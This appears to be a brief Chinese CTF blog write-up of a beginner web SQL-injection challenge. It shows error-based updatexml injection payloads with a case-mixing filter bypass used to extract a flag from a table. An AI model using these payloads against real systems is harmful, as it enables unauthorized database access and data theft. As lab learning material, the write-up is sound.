[第一章 web入门]SQL注入-2

打开之后什么都没有,还以为是网站崩了呢,返回题目抽了一眼发现让访问/login.php/user.php

没有头绪,url传参更不可能,于是上bp抓包爆破了一下,想走捷径,发现也不行,还是老老实实

的注入吧!

提示我们在url后面加?tips=1

构造我们的payload

name=1'and updatexml(1,concat(0x7e,(select 1 from dual)),1) -- 1&pass=1231321

提示我们sql语句有问题,应该是过滤了什么,尝试一下

大小写绕过,发现管用,有回显,然后接着去注入

SELECT 1 FROM DUAL,这句话的意思是:从DUAL这张表中输出一个常量1

第二天醒了 换一种方法

name=1'and updatexml(1,concat(0x7e,(sElEct flag from fl4g)),1) -- 1&pass=1' and 1=2 -- 1

updatexml(1,concat(0x7e,(),0x7e),1)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

過路人!

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值